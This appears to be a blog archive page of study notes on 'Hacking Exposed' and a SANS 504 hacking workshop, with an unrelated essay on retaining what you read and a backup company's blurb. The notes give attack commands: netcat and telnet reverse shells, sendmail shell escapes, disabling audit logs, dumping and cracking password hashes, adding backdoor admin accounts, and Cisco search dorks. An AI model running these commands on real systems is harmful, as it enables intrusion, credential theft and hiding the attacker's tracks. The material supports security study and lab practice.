Thursday, December 26, 2019

Secure cloud data backup and more

Founded by Morten Westerberg, who has dual US and Danish citizenship, in 2003, Nordic Backup was one of the first companies with a vision for cloud backup. For nearly two decades and thousands of companies and individuals protected, Nordic Backup has never a lost a single byte of customer data. We’ve restored thousands of computers and millions of files, getting businesses back up and running and lives back to normal.
More than anything else, we believe that says who we are.

Hacking Exposed Notes

Footprinting – profiling an organization Internet, Intranet, Remote Access, and Extranet presence to determine security posture and netblocks

Website Pilfering – grabbing source code to analyze offline

Unix – Wget

Win – Teleport Pro

Search Engines – tools for searching multiple engines, IRC, email, etc at once

Win – FerretPRO($)

Web – DogPile

Registered Networks – internet whois searches

Current Registrars

Unix – Whois, Xwhois

Unix - $ whois “acme.” (list possible domains)

Unix - $ whois “HANDLE JS1234” (list POC info)

Unix - $ whois “” (list email info)

Web – US

Web – International

Web – US Military

Web – US Gov

DNS Interogation – zone transfers between primary and secondary

Unix - $ nslookup

$ server x.x.x.x

$ set type=any

$ ls –d >> /tmp/zone_out

Unix - $ host –l –v –t any

Unix - $ host (resolves Mail Exchange records)

Unix – axfr

Win – Sam Spade

Network Reconnaissance – determine path to network(access path diagram)

Unix - $ traceroute –S –p53 x.x.x.x ( p option allows you to specify port to start at and will increment by one; S option will stop incrementing once open port is found)

Requires patch

Unix – traceroute option –I uses ICMP packets, default is UDP

Win – tracert(CLI)

Win – VisualRoute , NeoTrace (GUI)

Counter Measure – log incoming traceroutes and send back false data


Scanning – determine systems that are alive and reachable via sweeps, port scans, and discovery tools

Ping Sweeps – sending out ICMP ECHO(type 8) across ranges

Unix – fping

Unix – nmap, use –sP option and valid net range, -PT<#> allows you to try other ports if blocked

Unix – Hping allows you to send fragmented packets(-f)

Unix – icmpenum ability to use ICMP TIME STAMP REQUESTS and ICMP INFO when ECHO is blocked, spoof packets with –s option, and passively list with the –p option

Win – Pinger

Win – Ping Sweep

Additional Tools

Unix – Loki2 wraps data in ICMP packets, used to bypass firewalls and install backdoors

Port Scanning – connecting to TCP and UDP ports on a target system to see which services are running and which OS

TCP connect scan – full three way handshake, easily detected by host or NIDS

TCP SYN scan – no ACK is sent, only RST /ACK so that no connection is made, stealthier

TCP Xmas Tree Scan – uses FIN, URG, PUSH packets to receive RST for closed ports

TCP Null Scan – sends packet with no flags to receive RST for closed ports

TCP ACK Scan – used to map firewall rulesets, determine statefullness

TCP Windows Scan – analyzes TCP window size for OS identification and open ports

TCP RCP Scan – Unix, detect RPC ports and associated program

UDP Scan – looks for ICMP port unreachable, less accurate, slower

Unix – Strobe TCP scanner, also grabs banners

Unix – Saint(SATAN) UDP scanner

Unix - netcat Multifunction scanner

Unix – nmap, -D option for decoy scan, -I option shows owner of service(root), -b ftp bounce

Win – SuperScan

FTP Bounce Scanning - allows attacker put/get data via 3rd party server that is trusted by the target host. Requires port command and writable directory on system

Scan Detection

Unix – Snort open source NIDS

Unix – scanlogd host based logging

Unix – PortSentry host based, detects and blocks

Unix – firewall scan detection

Win – Genius 3.2.3 windows host based scan detection

OS Determination – using techniques such as banner grabbing, port scanning, and stack fingerprinting to determine target hosts Operating System

Stack Fingerprinting – analyzing target machine’s TCP/IP stack for OS specific signatures. Each Vendor implements the TCP/IP stack slightly different.

Passive Stack Fingerprinting – no connections are made, only analyzing packets via a sniffer for specific attributes such as TTL, Window Size, and DF(don’t fragment bit). The results can be compared to the Siphon fingerprint db

Discovery Tools

Unix – Cheops Linux GUI for network discovery via ping, traceroute, queso

Unix – Scotty discovery tool, includes SNMP

Enumeration – process of extracting valid account and shared resource information for a target host


Windows Resouce Kits – contains useful Windows utilities

Win2K -


WinNT -

Null Sessions – CIFS/SMB & NetBIOS all unauthenticated sessions via port 139 & 445

Win – C:>\net use \\\IPC$ “” /u:”” (setting up a null session)

Win – edit registry key HKLM\SYSTEM\CurrentControlSet\Control\LSA\Restrict Anonymous

Must be set to 1 for NT and 2 for W2K to restrict null sessions. Read Hobbits CIFS paper for further info

Domain Enumeration – use netbios on UDP port 137 to list domains and domain machines

Win – C:\>net view /domain

C:\>net view /domain: (lists machines on domain)

NetBIOS Name Tables – grab NetBIOS names remotely

Win – C:\>nbtstat –A

Win – C:\>nbtscan

Unix/Win versions found at

Domain Controller Enumeration

Win – C:\>nltest /dclist: (ran over null session nltest /server:)

C:\>nltest /trusted_domains

Share Enumeration

Win – C:\>net view \\ (rmtshare, srvinfo [-s] also good NTRK)

Win – DumpSec also shows file system permissions and services

Win – Legion 2.1

Win – NAT

Misc Windows Enumeration Tools

Win – Epdump RPC service/port mappings

Win – netviewx lists specific server types like domain controller, RAS, print

C:\>netviewx –D -T

Win – Winfo automates null sessions

Win – Nbtdump provides HTML report

SNMP Enumeration

Win – Snmputil – browses MIB(Management Information Base) tree using default strings like public, private. The tree is hierarchical, so each time you “walk up” more information is revealed. “.” is the OID for Microsoft’s MIB.(NTRK)

C:\>snmputil walk public .

Win – IP Browser – Solarwinds GUI,

More CIFS/SMB Enumeration

Win – Dumpsec(DumpACL) – uses null session to get user, group, share, and policy info

Win – sid2user/user2sid – allows for easy conversion of SID’s to usernames and vice versa

C:\>user2sid \\ “domain users” (grabs the machines SID)

C:\>sid2user \\ 5 21 8915387 1645822062 18198280005 500 (grabs admin account’s user name, note 500 is always the admin RID, even if its renamed. Also, the first account created is always given an RID of 1000 and incremented by one from there)

Mark Russinovich

Win – Enum – CLI utility for enumeration & password guessing

C:\>enum –U –d –P –L –c

Win – Nete from sirdystic of CDC, similar to enum

Win – UserInfo/UserDump user Level 3 call on NetUserGetInfo API

LDAP Enumeration

Win – ldp.exe – Active Directory Administration Tool – connects to AD server and allows you to browse contents, runs on either port 389 or 3268(AD Global Catolog)

Banner Enumeration

Banner grabbing via telnet or netcat on various ports like 80, 21, 23, 25 will often leak system, OS, application, user, or version information. Also common to “nudge” the system into coughing up more information using commands like: GET / HTTP/1.0, HEAD, QUIT, HELP, ECHO, and sometimes just carriage returns.

Registry Enumeration

Regdmp(NTRK) or DumpSec(Somarsoft) can be both be used to do this, however by default Win2K Server usually doesn’t allow this. Review the Key HKLM\System\CurrentControlSet\Control\SecurePipeServer\Winreg\AllowedPaths

To see whats allowed


NFS Enumeration

Unix – showmount – lists all NFS(port 2049) exported file systems on a machine

$showmount –e

NIS Enumeraton

Unix – in general various NIS client tools can be used to guess the NIS domain name of a server and retrieve NIS maps, which contain valuable information(pscan by Pluvius)

User & Group Enumeration

Unix – finger(port 79), rwho, rusers all list out who is on the machine at the time. To disable these services simply edit the inetd.conf file and killall –HUP inetd

Unix – SMTP – VRFY will confirm name of valid user; EXPN will give out the actual mail address of aliases and mailing lists. Just telnet to port 25 to test.

Unix – tftp – if enabled, may allow you to get the /etc/password file.

RPC Enumeration

Unix – rpcinfo, rpcdump – both list the RPC bindings for all applications running on the box. RPC uses ports 111, 32771.

SNMP Enumeration

Unix – the net-snmp package will usually include both snmpget and snmpwalk

$ snmpget public system.sysName.0 (grabs host name)

$ snmpwalk public (grabs eniter MIB)

BGP Route Enumeration

Unix – ASN Queries – ASN(Autonomous System Numer) is a 16-bit integer purchased from ARIN to identify a company on the internet. Use to search for this info.

C:\> telnet (public router)

Ø show ip bgp (last number in AS Path is ASN)

Ø show ip bgp regexp _$ (will give you the public IP space of company)

Windows NT Hacking – gaining access, escalating privileges and covering tracks on Windows NT system

Password Guessing

Default Passwords

Null Passwords Tools NTInfoScan


Password Sniffing SMB Packet Capture(readsmb) included with l0phtcrack

PPTP – Unix based sniffer that captures VPN credentials(packetstorm)

Cain & Abel filters out login credentials

Pass The Hash NT Only, LSASS allows hash only authentication

Buffer Overflows unexpected input, which forces arbitrary code into the execution stack by DilDog by Barnaby Jack by Aleph One

Privilege Escalation

Hoovering process of stealing as much info off the machine as possible with a non-admin account. Srvinfo(NTRK) will enumerate shares and regdmp(NTRK) can probe the registry for info. Also good to script a find command in a batch file to look for the password string. GetAdmin uses DLL injection to add a user into the local admin group(crash4)

Sechole, Secholed escalates privileges of IUSR_machine_name account on IIS, must be able to upload to a executable directory on server

LPC Spoofing

hk(porttool) from Razor exploits the LPC Ports API, which has weak validation checks. Allows user to make a client thread as the SYSTEM user.

Password Cracking the SAM file may be obtained by booting to an alternate OS, from the repair directory, or extracting from the registry via tool.

Pwdump extracts password hashes from the SAM

L0phtcrack defacto standard for cracking windows passwords, not free anymore LC5

Cain & Abel - Poor man’s version of LC, free

Wordlists -

Exploiting Trusts

LSA Secrets - The key HKLM\SECURITY\Policy\Secrets holds service accounts in plain text, cached passwords of last 10 users, FTP and web plain test passwords, RAS usernames and passwords, and domain account information. Lsadump2 finds PID of LSASS and uses dll injection


WinDump, “w32 tcpdump” Ethereal
Dsniff for Win32

Keystroke Loggers - If sniffing fails, install a keystroke logger to obtain domain credentials

Remote Control & Backdoors - Remote.exe From NTRK, gives remote users a CMD shell. Most popular way to start it on the host is the us the AT command(scheduler service).

SC.exe - Service Controler will start the scheduler service if its not running C:\> sc \\ start schedule
C:\> net time \\ (to check time on remote system)
C:\> at \\ 10:40P “”remote /s cmd secret”” (launchesserver) C:\> remote /c secret (launches your client)

Netcat -TCP-IP Swiss-Army Knife
C:\> nc –L –d –e cmd.exe –p80 (starts listener on target host)
C:\> nc 80 (connects attacker to target host)

Netbus - similar to Back Orifice, the nbsvr.exe must be started on target first. Good idea to run in stealth mode by modifying the registry, however most Virus scans will detect it running. Default ports are 12345 and 20034
C:\> regini –m \\ regchange.txt (NTRK)

BO2K - Back Orifice, still under active development, works on 2K and XP

Along with these VNC, Netmeeting, and dameware are poplular gui-based remote control apps

Port Redirection
Netcat - “Shell Shoveling” target listens on one port while sending the output back via cmd shell to the attacker. The attacker must listen on 2 ports
$ nc 80 | cmd.exe | nc 25 (run on target)

Fpipe - Popular port redirector, also allows for specifying source port. Does have some session timeout issues though with TIME_WAIT and CLOSE_WAIT periods C:\>fpipe –v –l 53 –r 23 (command to run on target)

Root Kits - first Windows rootkit was from Greg Hoglund of A root kit is a software suite that substitutes command system binaries with Trojans. Rootkits use a technique known as “function hooking” to redirect calls without altering the executable or binary. The current generation of Kernel level rootkits are very difficult to detect as they are embedded in the OS.

Cover Tracks
Disable Auditing
C:\> auditpol /disable (NTRK)
Clear Event Log
C:\> elsave –s \\ -l “Security” -C

Hiding Files
C:\> attib +h [directory] (dos command)
NTFS File Streaming will hide stuff as additional file attributes. It requires the POSIX utility cp(NTRK)
C:\> cp : (just reverse to unhide)

Windows 2000 Hacking – gaining access, escalating privileges and covering tracks on Windows 2K system

Resource Kit Tools

IPSec Filters - built in feature which does packet filtering very early in the network stack and will drop any packets which fail to meet the rules. Only flaw is that it cannot block IKE, multicast, or broadcast traffic and can’t do port ranges.

NetBIOS/SMB - System information will still be leaked unless you do 1 of 2 things. Disabling File and Print Sharing on your outbound interface will prevent nullsessions. Set RestrictAnonymous = 2 in either the registry or in the Security Policy Manager.

Eavesdropping - All authentication sent using legacy LM hashes can be easily decrypted via L0phtcrack. Also, Kerberos authentication is not used if the user specifies an IP address instead of a hostname.

SMBRelay - When trying to connect to a share/server, Windows will automatically try to log in as the current user if no other authentication information is explicitly supplied, before asking the user for a logon/password. SMBRelay will conduct a MITM attack by fooling a user into connecting to your rogue server, meanwhile after capturing the traffic it is relayed to the actual destination and back to the end user.

Denial of Service
New Registry Keys
HKLM\Sys\CCS\Services\Tcpip\Parameters\SynAttackProtect = 2 (times out syn_received faster)
EnableDeadGWDetect = 0 (prevents attacker from changing default gw) EnablePMTUDiscovery = 0 (stops hackers from lowering MTU value)
KeepAliveTime = 300,000 (verify’s an idle connection is still intact)
Interfaces\NoNameReleaseOnDemand = 0 (stops malware)
Interfaces\PerformRouterDiscovery = 0 (stop router spoofing attack);en-us;142641

Nbname - This tools puts a host in Netbios Name Conflict effectively stopping all Netbios networking on the host. Must first disable NBT on attacker machine to use tool.
C:\>nbname /astat /confilict

Privilege Escalation
PipeUpAdmin - Pre SP2, puts current user into admin group when run from cmd prompt

NetDDE - Network Dynamic Data Exchange service allows applications to share date through “trusted shares”. Runs as SYSTEM, so arbitrary code can be attached to the request and viola your admin. Requires Visual C++.
C:\>netddemsg –s cmd.exe

Defeating SYSKEY - pwdump3 can extract hashes from the SAM. Also pwdump3e from ebiz can do this remotely via SMB. Can be used on bootable media to insert hashes into the SAM. It disables SYSKEY prior to doing this. Similar to NTFSDOS Pro.

Deleting SAM simply booting to an alternate OS and deleting the SAM nullifies the administrator password. DC are not vulnerable.

EFS - Encrypting File System allows users to encrypt files and folders at the OS level. Cipher can be used from the CMD line. Default Recovery Key is the local admin account, however it should be stored remotely.

EFS Temporary - EFS writes a temp file in plain text before encrypting a new file, however a low level disk editor like diskprobe.exe(RK) can recover the file even after its deleted because the disk blocks are not overwritten.

Exploiting Trust
LSA Secrets - lsadump2 still functions on W2K. Microsoft doesn’t consider it a problem
Multimaster Model - Within a Windows 2K forest, all domains replicate a shared Active Directory and trust each other with 2-way transitive trusts necessitated by the Kerberos implementation. Trusts between forests and NT domains are still one-way. This allows for consolidation of domains and delegation of permissions via OU’s (organizational units).

Back Doors
Trap-Dooring Path - When executables and DLL files are not preceded by a path in the registry, windows searches for them in a default order. Therefore by placing your trojaned file on the system drive, the system will launch it instead of the original file.

Remote Control
Terminal Services running on 3389, TS allows brute force password guessing even if a lockout policy is set. TS also allows existing connections to be hijacked if the previous user forgot to logout correctly, assuming you have their credentials.

New Stuff
Group Policy - GPO is a new 2K feature, that allows you to configure security parameters in one place to be enforced locally or on the domain. (Gpedit.msc)

Secedit - Security Configuration and Analysis tool allows admins to audit the local system security for compliance issues. It also allows you to automatically make updates and have them applied immediately.

XP Stuff
ICF - Internet Connection Firewall offers packet filtering on all inbound traffic, while permitting all outbound traffic.
Software Restriction Policy allows central control over application security to protect against various forms of malware.
Built-In Support for encrypted Wireless Networking(802.11).
MS Passport single-login solution for internet, works by using a tamper-resistant cookie for accessing all sites that support MS passport authentication.
Credential Management, WPA, Remote Desktop, UPNP

UNIX/Linux Hacking – gaining access, escalating privileges and covering tracks on *NIX system

Vulnerability Mapping is the process of mapping specific security attributes of a system to an associated vulnerability or potential vulnerability.

Nessus is a defacto standard because its free and works. (unix & windows ports)

Remote Attacks - Exploit a Listening Service (telnet, ftp, ssh, etc)
Route Through a Unix System – circumvent a Unix firewall by source routing your packets through the firewall. Works only if system has IP forwarding enabling.
User-Initiated Remote Execution – attacks requiring user interaction, such as browsing malicious web sites or opening email attachments.
Promiscuous Mode Attacks – crafted packets can exploit your sniffer application

Brute Force - Brutus Common tool
John - Standard Unix Cracker

Data Driven Attacks are executed by sending data to an active service that causes unintended or undesirable results.Buffer Overflow condition occurs when a user or process attempts to place more data into a buffer than was originally allocated. This type of behavior is associated with specific C functions like strcpy, strcat, sprintf etc. A buffer overflow condition would normally cause a segmentation violation to occur. When the attack is executed, special assembly code known as the egg is sent to the VRFY command as part of the actual string used to overflow the buffer. When it’s overrun, attackers can set the return address of the offending function, to point to their arbitrary code’s memory address, which usually includes a shell command.

Unix Memory Dump Analysis, Good Luck
Aleph One’s Paper Phrack 49
Hell Kit for writing buffer overflows
Disable stack execution in /etc/system:Set noexec_user_stack=1Set noexec_user_stack_log =1

Heap Overflows are based on overrunning memory that has been dynamically allocated by an application. This process differs from stack-based overflows, which depend on overflowing a fixed-length buffer.

Format String Vulnerability arises in subtle programming errors in the formatted output family of functions, which includes printf() and sprintf(). An attacker can take advantage of this by passing carefully crafted test strings containing formatting directives, which can cause the target computer to execute arbitrary commands. For example by using printf(buf) instead of printf(“%I”, buf) the system will read the first argument supplied by the user as the format string and allow arbitrary code to follow it.

Input Validation Attacks occur when a program fails to recognize syntactically incorrect input, a module accepts extraneous input, a module fails to handle missing input fields, or a field-value correlation error occurs. Often used to exploit CGI scripts or other web applications. Shell AccessX Term if enabled is the easiest way to get local gui access on a machine remotely, but may need to be combined with an exploit though. $ /usr/X11R6/bin/xterm –ut :0.0

Reverse Telnet/Netcat will both provide attackers with a back channel into the system that originates from the target host. Both require a listener to be running.
$ /bin/telnet 80 | /bin/sh | /bin/telnet 25
$ nc –e /bin/sh 80

TFTP/Anonymous FTP both will allow attacker to gain access to your machine and if a writeable/executable directory is available the system is toast. The services themselves may be vulnerable to exploits.Sendmail the standard Unix Mail Transfer Agent has been full of vulnerabilities dating back to 1988. Common attacks aside from buffer overflows, input validation, and SMTP enumeration include:Pipe Vulnerability which allows a user to escape to a shell after the data portion
Mail from:
Rcpt to: bounceData.
mail from:
binrcpt to: |sed ‘1,/^$/d’ | shdata Forward VulnerabilityCat > .forward (create forward file to ftp to users home directory)|”cp /bin/sh /home/gk/evil_shell ; chmod 755 /home/gk/evil_shell” (creates shell executable)
$ echo hello chump | mail gk@targetsystem.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Refer to for up to date information

RPC is a mechanism that allows a program running on one computer to seamlessly execute code on a remote system. Most buffer overflow attacks target RPC services that run as root in order to gain shell access to the target sytem. Common services exploited include rpc.ttdbserverdb(tooltalk), rpc.cmsd(CDE), rpc.statd(automount), mountd, sadmind, and snmpXdmid.

NFS allows transparent access to files and directories of remote systems as if they were stored locally. Most of the security provided by NFS relates to a data object known as a file handle. The file handle is a token that is used to uniquely identify each file and directory on the remote server. If a file handle can be sniffed of guessed, remote attackers could easily access those files on the remote system.
$ showmount –e (lists exported file systems & permissions)
$ mount :/ /mnt

Try NFSshell for more functionality

X Windows System allows exporting of the local graphical display to remote users.Xscan will scan an entire subnet looking for systems with xhosts + enabled and log any console keystrokes to a local logfile.
$ xlswins –display :0.0 (will list out hex id’s for you)
$ xwatchwin -w (allows you to observe somebody else’s x session)

DNS Insecurity refer to

SSH Insecurity refer to

Promisious Mode Attacks are common in Ethereal, tcpdump, and several other sniffersSymbolic Link can be exploited using any program, especially SUID ones, that creates a temp file and doesn’t perform any sanity checking. By linking that tmp file to the /etc/password or shadow file, the program will update it with its permissions and not root’s.
$ strings * | grep tmp (when run in /bin or /usr/bin, will list out good programs to target)

File Descriptors are nonnegative integers that the system uses to keep track of files rather than using specific filenames (0,1,2, std in, out, error). If a file descriptor is opened r/w by a privileged process, it may be possible for the attacker to write to the file while it is being modified. To shell out of vi, execute :!sh and then modify the tmp file or run exploit code.


Pen Testing Notes

Cisco Hacking Exposed

!Host=*.* intext:enc_UserPassword=* ext:pcf
enable password | secret “current configuration” -intext:the
“intitle:Cisco Systems, Inc. VPN 3000 Concentrator”
intitle:Cisco “You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator”
intitle:”Cisco CallManager User Options Log On” intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password"
inurl:webvpn.html “login” “Please enter your”
"ip host tftp"
intext:"Written by enable_15"

Windows Command Line Kung Fu
Enumerate the network
c:\set Use SET to get domain information and username
c:\net view Use NET VIEW to get computers in the users domain and other domains
c:\net view /domain Use NET VIEW to get computers in other domains
c:\net user Use NET USER to get local users on the computer you are on
c:\net user /domain All users in the current user's domain
c:\net localgroup Use NET LOCALGROUP to get the local groups on the computer
c:\net localgroup /domain Use NET LOCALGROUP to get the domain groups
c:\net localgroup administrators All users in the local administrators group
c:\net localgroup administrators /domain All users in the domain administrators group
c:\net group "Company Admins" /domain All users in the "Company Admins" group
c:\net user "wesley.pipes" /domain All info about this user
c:\nltest /dclist: List Domain Controllers...

Find a user
NBTSTAT -a remotecomputer | FIND "<03>" | FIND /I /V "remotecomputer"
WMIC /Node:remotecomputer ComputerSystem Get UserName
PSLOGGEDON -L \\remotecomputer
PSEXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name "
PSEXEC \\remotecomputer NET NAME
PSEXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username"

Kill McAfee
Get SYSTEM level cmd prompt

Wednesday, July 17, 2019

How to Retain More From the Books You Read in 5 Simple Steps

When I grew up, it wasn’t cool to read. These days, every coffee shop is packed with folks that are reading a book while sipping on a latte. That’s a great shift. I’m also reading more books than ever.

When I grew up, it wasn’t cool to read. These days, every coffee shop is packed with folks that are reading a book while sipping on a latte.
That’s a great shift. I’m also reading more books than ever. But here’s the thing: It’s not about how many books you read, it’s about how much you retain from what you read.
Most people I talk to don’t have a reading strategy. They just pick up something and start reading. I used to be like that. But now, that’s unthinkable to me. Sure, you might read a novel for entertainment.
But think about it; why do you even read a non-fiction book in the first place? Exactly, you want to get something out of it. You want to learn things that you can apply in your life to grow. That’s the whole point.
I’m often asked: “How do you remember information you read in books?” In this post, I’ll explain my system.

1. Have A Purpose

Before I even think about which books I’m going to read, I think about what I’m trying to achieve. I strongly believe that the content of books should align with what’s going on in your life. I’ll give you an example.
When I met one of my mentors in 2011, he recommended me to read Flow by Mihaly Csikszentmihalyi. I listened to his advice and bought the book. I also started reading it. But I didn’t connect with the content at the time. Does that mean Flow is a bad book? No. In fact, I read it a while back and really loved it. It’s the best book on working habits that I’ve read.
But back in 2011, that kind of stuff wasn’t on my mind. I had just finished my degree and started a business. I was hustling like a moron and only thinking about growing our business. That’s why you need a purpose to read.
What’s going on in your life? Are you building a business? Going through a divorce? Looking for a job? Trying to take the next step in your career? Do you want to get more things done?
Only read books that teach you how to overcome your current challenges.

2. See Yourself As A Teacher

Knowledge is only good if you apply it, right? But here’s one thing a lot of people don’t consider: Sharing knowledge is a great application. You might not be a teacher, but if you act like one, you’re already applying knowledge. All it takes is a mindset shift.
Don’t just ‘read’ a book. No, devour a book and talk about it with others.
Say to yourself: “I must focus on the book at hand because I’m going to share everything I learned with others. I better know my shit.”

3. Highlight & Make Mental Connections

The more connections you make between pieces of information in your brain, the better you remember it. I do that by making a lot of notes.
If you think books are sacred and shouldn’t be highlighted and written on, you will never retain a lot from books. Making notes, folding pages, and highlighting text is simple and practical.
That’s why I always keep a highlighter and pen with me. If you read digitally, you only need your finger—just don’t forget to highlight interesting passages.
Here are some other tips that help me to make better connections between information:
  • I have a separate “Book Notes” folder in my note-taking app.
  • When I highlight something very important, I take a picture of that page and upload it to my Book Notes.
  • Then, I immediately write WHY it’s important and how I can use it.
I use this process because I often highlight things, and when I look back, I think: “Why did I highlight this?”
So always write down why you highlighted something. You don’t have to do it for every highlight. Just do it for sections that you immediately have an application for. I often write down how I can use a piece of advice in my business. And when I get an idea for an article, I think of a title and attach a picture of the text that I highlighted.

4. Visualize & Imagine

Another great way to make connections in your mind is by visualizing what you’re learning. We’re visual learners, and our memories are also visual.
What I like to do when I read is to have imaginary conversations about the stuff that I’m reading. I imagine myself sitting together with a friend and talking about the subject. Or, when I read a piece of useful advice, I visualize myself actually doing that thing.
I remember vividly when I read How To Win Friends And Influence People by Dale Carnegie for the first time. One of the pieces of advice Carnegie gives, is to become genuinely interested in people.
So I visualized myself having a conversation with a stranger and being genuinely interested in what that person had to say. When you visualize something, it’s almost like the real thing.
Visualization is also a common self-improvement tool that’s been used many top-performers. Recently retired NBA-player Paul Pierce once explained how he uses it before a game:
“I probably visualize myself, the shots I’m going to get in the game, how I’m going to play defense, what we have to do to stop the other team’s best player, what it’s going to take out of me, the whole aspect of the game.”

5. Immediately Apply One Piece Of New Knowledge

Look at your life. Ask yourself: How can I grow? That can be personally, financially or spiritually.
Understand that growth doesn’t happen by itself. Learning new skills, earning more money, having a great relationship — it all takes hard work.
But you can make that growth a lot easier if you apply the things you learn in books.
Remember: Knowledge alone is completely useless.
There’s nothing sadder than a well-read person who holds himself captive by the four walls of his room. You must go out there and apply things you learn.
Once you do that, you will grow. No doubt about it. So always ask yourself this after you finish a book:
“What’s the one thing I’m going to apply after reading this book?”
You see, it’s about what you do with your knowledge, not about how much you have. Don’t read more. Read smarter.
Also, apply this strategy to everything you read. Even something little like this article. So let’s do a little exercise to close this off:
What’s the one thing you’re going to apply after reading this article?
Answer (and visualize) that, and I’ll bet you’ll retain more from this article than any other thing you’ve read today.

Say to yourself: “I must focus on the book at hand because I’m going to share everything I learned with others. I better know my shit.”

So always write down why you highlighted something.

It’s not about how many books you read, it’s about how much you retain from what you read.


Thursday, May 2, 2019

5) 504.6 - Computer & Network Hacker Exploits, WORKSHOP

504.6 - Hacker Tools Workshop\6.1 Hacker Exploits Hands-On:

Most ImportantTools to Use Today
• Very Important:
— Nmap: Port scanning and OS fingerprinting (Linux)
— Nessus: Vulnerability scanning (Linux)
— Netcat: Backdoors and file transfer (Windows and Linux)
— Enum: Determining users and groups, and password guessing (Windows)
— Metasploit: Exploiting vulnerable targets (Linux and Windows)
— John the Ripper: Password cracking (Linux and Windows)
— Fgdump: Remote SAM password hash dumper (Windows)
• Everything you need to win the game is included in this environment

Step I: Overview of Reconnaissance:
• Acquire Domain Name
• Open Source
• Whois lookup
• ARiNlookup
• DNS Interrogation

Acquire Domain Name
• No connection to the Internet (we want to control the environment), so we Will simulate the next steps
Let’s pick a target organization
• How about an organization named “SANS 504 Target Company” with domain name “target.tgt”?
• They are the owner of Target Widgets, producer of the finest Widgets in the world
• Analyze their websites and think about the business service that each offers

Do a Whois search for target.tgt!

You will notice:

DNS Interrogation - Zone Transfer:
• To perform a zone transfer, we can use nslookup in Windows or dig in Linux
• Windows:
C:\> nslookup
> server
> ls -d target.tgt

• Linux:
# dig @ target.tgt —t AXFR

• Goal is to harvest target IP addresses

Step 2: Overview of Scanning
• Ping Sweeping (Nmap)
• Port: Scanning (Nmap)
• OS Fingerprinting (Nmap)
• Vulnerability Scanning (Nessus)
• Null Sessions (Windows)

Server Discovery — Exercise
• Using Nmap, try to fill out information about the target servers
• Use the templates earlier in this book
• Draw a diagram of the network, based on the discovery phase (the diagram will be simple!)
• Include the following:
— Topology layout
— IP addresses
— Open ports, with services and versions if possible
— Operating system type

Enum Against Windows:
• Don’t forget to run Enum against all discovered Windows machines
— Enum With various flags will be useful:
C:\> enum —U [target IPaddr]
C:\> enum —G [target IPaddr]
C:\> enum -D —u [user) —f [password.lst) [targettP)
— For enum —D, please make sure your system can speak NTLMv1
Run secpoLmsc
Go to Local PoliciesSecurity --> Options --> Network Security:
LAN Manager Authentication
• Make sure it is set to “Send LM & NTLM responses”.

Step 3: Gaining Access:
• Run exploits
• Depends on what was discovered during Phase 2
• Automated password guessing?
• Common Windows attacks?
• Metasploit exploitation
• Easily cracked passwords?
• Buffer overflow vulnerabilities?
• Others?

Compromising Additional Machines
• Once one machine is compromised, attackers can use it as a jumping off point for other attacks
— Exploit Windows $MB sessions between target machines
• Net use, at, etc.
— Crack passwords, and look for systems where users have set up identical passwords on multiple machines.

Step 4: Keeping Access
• Planting Netcat backdoor
• Use Metasploit shell or Meterpreter payloads
• Deploying VNC
• Others?
• DO NOT put Rootkits on the target machines; too risky.

Step 5: Covering the Tracks
• Creating hidden files on Linux
— Directories named
• Creating hidden files on Windows
— Alternate data streams
• Don’t forget about shell history files!
— Could be useful for you to see what others are attempting
— You might want to cover your tracks by deleting your own shell histories on my machines.

Bulding a Lab at Home:
• Windows 2012 Server, IIS
• Linux, FTP Apache
• Windows 8, File Sharing
• openBSD, NFS, OpenSSH.

Capture the Flag Contest
• We’ll play a game of capture the flag
• There are four regular flags and one bonus flag
— flag1.txt, flag2.txt, flag3.txt, and flag4.txt
— and bonusflag.txt
— All flags located in the top of the directoiy structure (inside c : \ on Windows and / in Linux)
• Each flag provides you information about a “Phrase that pays"
• Break in to my machines, look at the flags, and determine the phrase that pays.

Are you READY?
Remember the attack process:
1. Reconnaissance
2. Scanning
3. Exploiting Systems
4. Keeping Access — Backdoors and Trojans
5. Covering the Tracks
• Are there any questions on the ground rules or the Capture the Flag game?

DNS Interrogation:
• To attempt a zone transfer from a Windows system
- C:\> nslookup
—> server 1O.1O.1O.45
-> ls —d target.tgt
• To attempt a zone transfer from a Unix system
- #dig @ target.tgt —t AXFR

• Run an “Aggressive” Nmap scan (scan, OS fingerprint, version scan and NSE scripts) and save output to a file for future reference
- # nmap —A <target> --reason —o <file>

• Scan specific port(s) on target
- # nmap -p <port(s)> <target> --reason

• Perform a version scan on specific port(s)
# nmap —sV -p <port(s)> <target> --reason

• Additional options you might find helpful
- --reason         (shows target response)
- --packet_trace     (shows packet details)
- --traceroute         (shows network topology)

Enum (to enumerate passwords):
• To use Enum to enumerate information about a Windows target
• Enumerate User Accounts
C: \> enum —U [target]
• Enumerate Password Policy Information
- C: \> enum —P [target]
• Enumerate Groups
C: \> enum —G [target]
• You can combine the options
- C: \> enum —UGP [target]
• Run a dictionary attack against a target
- C:\> enum —D —u [user] —f [wordfile] [target]

Appendix: Helpful commands Pwdump:
• To dump the passwords from a remote machine that you have an admin level user ID and password for
- C:\> pwdump3 [outfile] [user]

• Then enter the password for the user id you used.

- steps to setup an exploit/payload combo
- we will use psexec once we know the username and password.

John The Ripper
• Linux: To unshadow a passwd file
- # unshadow /etc/passwd /etc/shadow > /tmp/combined
• Linux: To crack an un-shadowed password file
- # john /tmp/combined
• Windows: To crack a file with Windows hashes
- C:\> john <hash file>
• Remember to delete “john.pot” when you want to restart a cracking session or it Will pick up where it left off.

Windows Net Commands:
• To create an Administrator-level account
- C:\> net user /add [user] [password]
- C:\> net localgroup administrators /add [user]

• To delete a user account that you’ve created
— C:\> net user [user] /delete
• Map a local drive letter to the remote target’s C$ (requires Administrator-level credentials)
- C:\> net use * \\[target]\C$ [password] /u:[targetlP]\[user]
• To delete all of your net use sessions (careful)
C:\> net use * /d /y

Remote Access
— $ vncviewer
- $ ssh User@<TargetIP>
• Telnet
- $ telnet <TargetIP>

• To create a netcat listener (Example)
# nc -lnvp 7777
• To connect to a port (Example)
# nc —nv 7777
• To shovel a shell (Linux Example)
- # nc —lnvp 7777 —e /bin/sh
• To shovel a shell (Windows Example)
# nc —lnvp 7777 —e cmd.exe
To shovel the contents of a file
- # no —lnvp 7777 < file.txt
• To set up a persistent Linux listener
